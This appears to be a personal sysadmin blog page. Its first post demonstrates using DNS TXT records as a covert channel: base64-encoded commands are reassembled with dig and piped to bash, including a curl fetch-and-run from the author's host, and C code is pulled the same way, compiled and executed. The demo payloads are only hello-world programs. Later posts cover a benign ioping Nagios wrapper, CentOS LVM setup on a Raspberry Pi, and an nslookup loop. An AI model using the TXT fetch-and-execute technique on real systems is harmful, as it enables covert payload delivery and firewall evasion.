Using DNS TXT Record Abuse for Exploiting Servers

With everything that's been in the news lately with malware and WannaCry, I figured it'd be fun to prove this out for myself and post about it. The below, of course, assumes that your environment has already been compromised or has someone on it who wants to do something nefarious (a disgruntled employee?). I am going to show you, in its most simplistic form, how DNS TXT records can be abused to pass data between servers, even when the server you want to exploit is behind a firewall and can only make DNS requests.

Why is this useful? Because the data in a TXT record can be any combination of ASCII text. What this means, simply, is that you are able to obfuscate data with GPG or, even more simply, base64 encode and decode it. This is beneficial for hiding from an IDS or IPS.
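As a concrete sketch of the publishing side (my own illustration, not something from the records' actual setup): base64-encode the command you want to deliver and chop the result into fixed-width chunks, one per TXT record. The 64-character width is just a convenient choice; a single TXT character-string tops out at 255 bytes.

```shell
# Encode a command and split it into 64-character chunks - each chunk
# becomes the contents of one TXT record (txtline1, txtline2, ...)
payload='curl -s -q https://ckozler.net/remote_shell.txt.php'
printf '%s\n' "$payload" | base64 | tr -d '\n' | fold -w 64
```

Concatenating the chunks back together and base64-decoding them returns the original command, which is exactly what the dig pipelines in Example 1 do.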

DNS is everything. When things fail, it's usually because of a DNS issue (within context, of course), and DNS traffic is typically relatively trusted in organizations. The abuse here relies on normal recursion: when a DNS server is asked for a record it does not know, it forwards the request up to the root zone, which helps it find the authoritative DNS server for the queried domain so that a result can be returned for the queried hostname.

Example: I am a server inside of an organization that has the ability to issue DNS requests. What this means is that I can request google.com – my internal DNS server probably knows this already from cache and responds. What if I ask for ckozler.net? My internal DNS server probably won't know this and will forward the query up to the root servers, which refer it to the .net TLD servers to find where ckozler.net is delegated. .net responds with the NS record ns1.worldnic.com. Then ns1.worldnic.com. is queried for the @ record for ckozler.net, which responds with 104.236.30.66 (the host where you are reading this page).

So what happened here? I was able to “leave” the organization to request data from an external server and retrieve it and read it. Simply put, instead of being able to use curl or wget to request something from a remote web server, I used DNS to traverse the open internet and get input from a remote server. As I said earlier, TXT records can contain ASCII text. ASCII text means data and data means exploits.

Below I will show an example of this. I will describe the environment as well, so hopefully after reading this you can understand what is going on from a technical standpoint. It will be extremely high level, because I'm not a hacker or security expert, but it will show you how you can move data between sites with DNS TXT records.

The idea of obfuscating the data inside the TXT records is that when IDSes and IPSes inspect the traffic, they aren't able to really see "inside" of the response. All they see is a seemingly random array of ASCII text.

DISCLAIMER: I am not a security expert, nor do I pose as one. I am simply showing how hackers and malware writers are able to leverage basic networking functions in ways that can be much harder to detect.

Setup

'client' is an already compromised server inside an organization somewhere, whether through a disgruntled employee or otherwise. The only requirement is that it can query DNS. Let's assume it's locked down from outbound access to any server except the internal DNS server.

Again, there are a ton of assumptions here; I am just showing the concepts.

I will show 2 examples. In the first, I fetch a remote bash script via curl and then execute it. In the second, I fetch C code, compile it, and run it. Example 1 assumes HTTP/HTTPS outbound from the server is allowed, and example 2 assumes the server has gcc installed.

Example 1

client]$ dig -t TXT txtline1.ckozler.net | grep ^txt
txtline1.ckozler.net.	6601	IN	TXT	"Y3VybCAtcyAtcSBodHRwczovL2Nrb3psZXIubmV0L3JlbW90ZV9zaGVsbC50eHQu"

client]$ dig -t TXT txtline2.ckozler.net | grep ^txt
txtline2.ckozler.net.	7141	IN	TXT	"cGhwCg=="

client]$ dig -t TXT txtline1.ckozler.net txtline2.ckozler.net | grep '^txt' | awk '{ print $5 }' | tr -d '"' 
Y3VybCAtcyAtcSBodHRwczovL2Nrb3psZXIubmV0L3JlbW90ZV9zaGVsbC50eHQu
cGhwCg==

client]$ dig -t TXT txtline1.ckozler.net txtline2.ckozler.net | grep '^txt' | awk '{ print $5 }' | tr -d '"' | openssl enc -base64 -d 
curl -s -q https://ckozler.net/remote_shell.txt.php

client]$ dig -t TXT txtline1.ckozler.net txtline2.ckozler.net | grep '^txt' | awk '{ print $5 }' | tr -d '"' | openssl enc -base64 -d | bash -s 
#!/usr/bin/env bash

echo "Hello world! I was downloaded from http://ckozler.net/remote_shell.txt.php with instructions from a TXT DNS record"
exit 0

client]$ dig -t TXT txtline1.ckozler.net txtline2.ckozler.net | grep '^txt' | awk '{ print $5 }' | tr -d '"' | openssl enc -base64 -d | bash -s  | bash -s
Hello world! I was downloaded from http://ckozler.net/remote_shell.txt.php with instructions from a TXT DNS record

So what happened? You can see that I query txtline1.ckozler.net and get data, then txtline2.ckozler.net and get the second of the base64 encoded strings. These two records reassemble into the curl command that fetches the bash script hosted at https://ckozler.net/remote_shell.txt.php. I then decode that command, run it, and pipe the script it fetches into bash, which spits out "Hello world!"

The magic here is the base64 encoded data. Of course, I am sure IDSes and IPSes can pick this up, but base64 is a good, quick, and easy way to obfuscate data and try to hide.

This example simply proves the concept of how to move data or instructions between a remote external DNS server and a "secured" internal server.
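To make the moving parts easy to poke at offline, here is the decode half with the two TXT payloads from above pasted in as literals. In the real flow they arrive via the dig pipeline, and the trailing `| bash` stages actually execute the result; this sketch only prints it.

```shell
# The two chunks served by txtline1/txtline2, hard-coded for illustration
line1='Y3VybCAtcyAtcSBodHRwczovL2Nrb3psZXIubmV0L3JlbW90ZV9zaGVsbC50eHQu'
line2='cGhwCg=='

# Reassemble and decode - this prints the curl command, it does not run it
printf '%s\n%s\n' "$line1" "$line2" | openssl enc -base64 -d
```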

Example 2

Now we're going to fetch some C code from TXT records and run it. The previous example assumed HTTP/HTTPS (ports 80 and 443) outbound towards ckozler.net was open. Well, what if this isn't the case? What if we, for instance, see that the kernel on server 'client' is susceptible to a privilege escalation exploit? Perfect! Let's get some code from DNS TXT records!


# Get the first line of the base64 encoded C code
client]$ dig -t TXT c_code_line_1.ckozler.net | grep ^c_code_line
c_code_line_1.ckozler.net. 3599	IN	TXT	"I2luY2x1ZGUgPHN0ZGlvLmg+CmludCBtYWluKCkgewoJcHJpbnRmKCAiaGVsbG8g"

# Get the second line
client]$ dig -t TXT c_code_line_2.ckozler.net | grep ^c_code_line
c_code_line_2.ckozler.net. 3599	IN	TXT	"d29ybGRcbkkgd2FzIGRvd25sb2FkZWQgdGhyb3VnaCBhIFRYVCByZWNvcmQgYW5k"

# Get the third line
client]$ dig -t TXT c_code_line_3.ckozler.net | grep ^c_code_line
c_code_line_3.ckozler.net. 3599	IN	TXT	"IGNvbXBpbGVkIGxvY2FsbHkiICk7CglyZXR1cm4gMDsKfQo="

# Now get them all at once
client]$ dig -t TXT c_code_line_1.ckozler.net c_code_line_2.ckozler.net c_code_line_3.ckozler.net | grep ^c_code_line
c_code_line_1.ckozler.net. 3599	IN	TXT	"I2luY2x1ZGUgPHN0ZGlvLmg+CmludCBtYWluKCkgewoJcHJpbnRmKCAiaGVsbG8g"
c_code_line_2.ckozler.net. 3562	IN	TXT	"d29ybGRcbkkgd2FzIGRvd25sb2FkZWQgdGhyb3VnaCBhIFRYVCByZWNvcmQgYW5k"
c_code_line_3.ckozler.net. 3564	IN	TXT	"IGNvbXBpbGVkIGxvY2FsbHkiICk7CglyZXR1cm4gMDsKfQo="

# We still have quotes, want to get rid of them
client]$ dig -t TXT c_code_line_1.ckozler.net c_code_line_2.ckozler.net c_code_line_3.ckozler.net | grep ^c_code_line | awk '{ print $5 }'
"I2luY2x1ZGUgPHN0ZGlvLmg+CmludCBtYWluKCkgewoJcHJpbnRmKCAiaGVsbG8g"
"d29ybGRcbkkgd2FzIGRvd25sb2FkZWQgdGhyb3VnaCBhIFRYVCByZWNvcmQgYW5k"
"IGNvbXBpbGVkIGxvY2FsbHkiICk7CglyZXR1cm4gMDsKfQo="

# Now it's cleaned up; it's literal base64 encoded text
client]$ dig -t TXT c_code_line_1.ckozler.net c_code_line_2.ckozler.net c_code_line_3.ckozler.net | grep ^c_code_line | awk '{ print $5 }' | tr -d '"'
I2luY2x1ZGUgPHN0ZGlvLmg+CmludCBtYWluKCkgewoJcHJpbnRmKCAiaGVsbG8g
d29ybGRcbkkgd2FzIGRvd25sb2FkZWQgdGhyb3VnaCBhIFRYVCByZWNvcmQgYW5k
IGNvbXBpbGVkIGxvY2FsbHkiICk7CglyZXR1cm4gMDsKfQo=

# When we pass it to openssl -d we can see the actual text
client]$ dig -t TXT c_code_line_1.ckozler.net c_code_line_2.ckozler.net c_code_line_3.ckozler.net | grep ^c_code_line | awk '{ print $5 }' | tr -d '"' | openssl enc -base64 -d
#include <stdio.h>
int main() {
	printf( "hello world\nI was downloaded through a TXT record and compiled locally" );
	return 0;
}

# Now let's write it to a file and compile it with GCC
client]$ dig -t TXT c_code_line_1.ckozler.net c_code_line_2.ckozler.net c_code_line_3.ckozler.net | grep ^c_code_line | \
> awk '{ print $5 }' | tr -d '"' | \
> openssl enc -base64 -d > /var/tmp/txt.poc.c; gcc -o /var/tmp/txt.poc /var/tmp/txt.poc.c; /var/tmp/txt.poc
hello world
I was downloaded through a TXT record and compiled locally

client]$ 

So what you can see here is that we were able to successfully move C code via DNS TXT records. Of course, large exploits would require many records, but things such as shellcode privilege escalation exploits would need far fewer lines.

I hope you found this post informative. If I made any mistakes or anything is not clear, please feel free to drop a line in the comments.

Thanks!

iomonitor – wrapper script for ioping

Link to it on my github because the formatting is screwed up here.

This is a wrapper script for ioping. It can be implemented in a cronjob (ex: with https://healthchecks.io) or as an NRPE command for Nagios. Use --nagios-perfdata to generate perfdata for Nagios to consume.

I needed a way to track I/O latency on a VM hypervisor node (oVirt) because one oVirt node of 3 kept reporting latency to storage, but it was the only one reporting it (and it was guaranteed not to be a config issue). I set this up in Nagios to run every minute for 15 runs, which usually takes ~15 seconds.
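For reference, the NRPE side can be wired up with a command definition along these lines. The install path, monitored directory, and every threshold value here are placeholders; derive real thresholds from a baseline run as described in the script header below.

```
command[check_io_latency]=/usr/local/bin/iomonitor --directory /var/tmp --count 15 --nagios-perfdata --min-warn 0.0005 --min-crit 0.001 --max-warn 0.005 --max-crit 0.01 --avg-warn 0.001 --avg-crit 0.005
```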

This is what it looks like inside NagiosXI (screenshot not reproduced here)

#!/usr/bin/env bash

#
# Wrapper script for ioping. Can be implemented in to a cron
# job or as an NRPE command for nagios. Use --nagios-perfdata to generate perfdata
# for Nagios to consume
#
# I needed a way to track I/O latency on a VM hypervisor node (ovirt)
# because the ovirt engine kept reporting latencies but it was the only one
# reporting it (and guaranteed not a config issue). I set this up in nagios 
# to run every minute and run for 15 runs which is usually ~15 seconds
#
#
# It is suggested to first get a baseline for what your system looks like by
# running the script with all zeros for crit/warn, then using the "raw data" line
# to generate some values you consider warn/critical. I used a
# count of 120 (2 minutes) then min/max/avg * 1.5 for warning and * 2.5 for critical
#
#	* While running this I did the following on my home directory
#
#		while [ true ]; do ls -alhtrR $HOME; done
#
#	to generate some I/O without using DD, figured all the stat() calls would be
#	better geared towards real use 
#
#
# Example:
#
#	./iomonitor --directory /tmp --min-warn 0 --min-crit 0 --max-warn 0 --max-crit 0 --avg-warn 0 --avg-crit 0 --count 120
#


# Check dependencies
if [ -z "$(command -v ioping)" ]; then
	echo "* ERROR: Cannot find ioping command"
	exit 254
fi

if [ -z "$(command -v bc)" ]; then
	echo "* ERROR: Cannot find bc command"
	exit 254
fi


# This prints when using the -v flag
function debug_write() {
        if [ -n "${dbg}" ]; then
                echo "* $@"
        else
                return
        fi
}


# Collect arguments
setargs(){
	while [ "$1" != "" ]; do
    		case $1 in
      			"--min-warn")
        			shift
       			 	min_warn=$1
        		;;
			"--min-crit")
				shift
				min_crit=$1
			;;

			"--max-warn")
                                shift
                                max_warn=$1
                        ;;
                        "--max-crit")
                                shift
                                max_crit=$1
                        ;;

			"--avg-warn")
                                shift
                                avg_warn=$1
                        ;;
                        "--avg-crit")
                                shift
                                avg_crit=$1
                        ;;

			"-c" | "--count" )
				shift
				count=$1
			;;
			
      			"-d" | "--directory")
				shift
        			directory="$1"
        		;;
			"--nagios-perfdata")
				perfdata=1
			;;	
			"-v" | "--verbose")
				#shift
				dbg=1
			;;
			
    		esac

    		shift
  	done
}

setargs "$@"

# Startup
debug_write "min_warn=${min_warn}"
debug_write "min_crit=${min_crit}"
debug_write "max_warn=${max_warn}"
debug_write "max_crit=${max_crit}"
debug_write "avg_warn=${avg_warn}"
debug_write "avg_crit=${avg_crit}"
debug_write "count=${count}"
debug_write "directory=${directory}"

# If count is empty, default to 15
if [ -z "${count}" ]; then
	count=15
fi

# Move in to the directory for ioping to run
cd "${directory}"
cdres=$?
if [ ${cdres} -ne 0 ]; then
	echo "* ERROR: Failed to CD to ${directory} to run ioping test. Exiting"
	exit 254
fi

# Stuff
debug_write "Current directory - $(pwd)"

# Run ioping
debug_write "Running ${count} times"
cmd=$(ioping -c ${count} .)

# --verbose
debug_write "output: ${cmd}"

# Grep the line we care about
line=$(echo "${cmd}" | grep "^min/avg/max/mdev" )
debug_write "line: '${line}'"

# Now awk the fields out
data_lines=$(echo "${line}" | awk '{ print $3 " " $4 "\n" $6 " " $7 "\n" $9 " " $10 "\n" $12 " " $13 };')

# Array for data parsing
declare -a data

# Conversions
SAVEIFS=$IFS
IFS=$(echo -en "\n\b")
count=0
for i in $(echo "${data_lines}"); do
	# TODO: Make what to convert to an argument
	# we default now to seconds. People may want to monitor at ms level
	#... but I suck at math

	value=$(echo "$i" | cut -d ' ' -f1)
	unit=$(echo "$i" | cut -d ' ' -f2)
	case "${unit}" in
		ns)
			conversion="0.000000001"
		;;
		us)
			conversion="0.000001"
		;;
		ms)
			conversion="0.001"
		;;
		s)	
			conversion="1"
		;;
		m)
			conversion="60"
		;;
		h)
			conversion="3600"
		;;
		*)
			echo "* ERROR: Received unit we could not convert. Got ${unit}"
			exit 245
		;;
	esac

	debug_write "(${unit}) - ${value} * ${conversion}"
	converted=$(echo "scale=6; ${value} * ${conversion}" | bc | awk '{printf "%f", $0}')

	data[${count}]=${converted}
	count=$((${count}+1))
done
IFS=$SAVEIFS


min=${data[0]}
avg=${data[1]}
max=${data[2]}
mdev=${data[3]}
debug_write "Converted to seconds: $min / $avg / $max / $mdev"


# now check warn/crit
exit_crit=0
exit_warn=0
output=""
perfdataoutput=""

# Because I'm lazy and using a function is prettier
function append() {
	output="${output}$@"
}

function perfdata_append() { 
	perfdataoutput="${perfdataoutput}$@ "
}

# Use BC to do float comparison
function comp() { 
	bc <<< "$@"
	return $?
}

# Iterate the fields we need. Doing it this way avoids repeat code
# Why repeat code when we can use bash's flexibility?!
for i in min max avg; do
	# Yay bash variable substitution!
	# use the value when we need to and the variable name when we need to
	# ex: ${idx_name} expands to min and ${idx_warn} expands to min_warn,
	# so ${!idx_warn} expands to the value of min_warn (the arg input field)
	idx_inner_val="${!i}"
	idx_name="$i"
	idx_warn="${idx_name}_warn"
	idx_crit="${idx_name}_crit"

	debug_write "${idx_inner_val} > ${!idx_warn}"
	debug_write "${idx_inner_val} < ${!idx_crit}"

	if [ $(comp "${idx_inner_val} > ${!idx_warn}") -eq 1 ] && [ $(comp "${idx_inner_val} < ${!idx_crit}") -eq 1 ]; then
		append " * WARNING: '$directory' storage latency ${idx_name} response time ${idx_inner_val} > ${!idx_warn}\n"
		exit_warn=1
	fi
	
	if [ $(comp "${idx_inner_val} > ${!idx_crit}" ) -eq 1 ]; then
	        append " * CRITICAL: '$directory' storage latency ${idx_name} response time ${idx_inner_val} > ${!idx_crit}\n"
	        exit_crit=1
	fi

	perfdata_append "${idx_name}=${idx_inner_val}"

done

# May as well print the raw data when we print anything else or the OK
append "raw data: ${line}"


# Warn / crit / OK logic 

# Crit
if [ ${exit_crit} -eq 1 ]; then
	echo -e "${output}" 
	if [ ! -z "${perfdata}" ]; then
		echo -e " | ${perfdataoutput}"
	fi
	exit 2
fi

# Warn
if [ ${exit_warn} -eq 1 ]; then
	echo -e "${output}" 
	if [ ! -z "${perfdata}" ]; then
                echo -e " | ${perfdataoutput}"
        fi
	exit 1
fi

# Else OK 
echo -e "OK - ${directory} latency - ${output}" | tr -d '\n'
if [ ! -z "${perfdata}" ]; then
	echo -e " | ${perfdataoutput}"
fi


exit 0
Moving CentOS 7 to LVM on Raspberry Pi 3 / ARMv7L

I will formalize this later when I can

  1. This is purely assuming you're using CentOS 7 on an RPi3 and have DD'ed the image per their installation instructions. This assumption underlies the steps below
  2. Confirm your kernel has support via the CONFIG_BLK_DEV_INITRD compile option. You can check /proc/config.gz for this; if you don't have it, then modprobe configs
  3. Generate an initrd – dracut -f -v /boot/initrd $(uname -r)
  4. Append ‘initramfs initrd 0x01f00000’ to /boot/config.txt
  5. Modify /boot/cmdline.txt to read initrd=0x01f00000 after root=/dev/…. and before rootfstype=ext4
  6. Reboot as a test. Note that your boot time will go from about 5-10 seconds to upwards of a minute or so. You will see the Raspberry Pi splash screen for about 5 seconds as opposed to .5 or 1 second before. This is because the Pi now needs to load the 26MB initrd in to memory before continuing
  7. If it comes back up then you can move the file system now
  8. Edit /etc/fstab and change noatime for / to be ro,noatime
  9. Reboot
  10. yum install -y lvm2
  11. fdisk /dev/mmcblk0
  12. Create a new partition and exit
  13. Reboot
  14. pvcreate /dev/mmcblk0p4
  15. vgcreate root /dev/mmcblk0p4
  16. lvcreate --name="lv_root" -l 45%FREE root (more on this later)
  17. mkdir /mnt/new
  18. mount /dev/mapper/root-lv_root /mnt/new
  19. Copy the file system: tar -cvpf - --one-file-system --acls --xattrs --selinux / | tar xpf - -C /mnt/new/
  20. Edit /boot/cmdline.txt root= to be root=/dev/mapper/root-lv_root
  21. Reboot
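The cmdline.txt edit in steps 4-5 is easy to get wrong, so it can be dry-run against a throwaway string first. The kernel parameter values below are made-up placeholders; use whatever your real /boot/cmdline.txt contains.

```shell
# Simulate inserting initrd=0x01f00000 after the root= parameter,
# without touching the real /boot/cmdline.txt
cmdline='root=/dev/mmcblk0p3 rootfstype=ext4 elevator=deadline'
echo "$cmdline" | sed 's|\(root=[^ ]*\) |\1 initrd=0x01f00000 |'
```

Once the output looks right, run the same sed in place against the real file (with a backup).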

Test Post

Please ignore

#!/usr/bin/env bash

# LIST is expected to hold a whitespace-separated list of hostnames to resolve.
# Lines mentioning the internal DNS server (10.1.10.11) are filtered out so
# only the resolved address remains
for i in $(echo "${LIST}"); do
	IP=$(nslookup $i | grep -iv 10.1.10.11 | grep -i address | cut -d ":" -f2 | tr -d '\r' | xargs echo)
	if [ -z "${IP}" ]; then
		IP=COULD_NOT_FIND_IP_FIND_MANUALLY
	fi
	echo "$i,${IP}"
done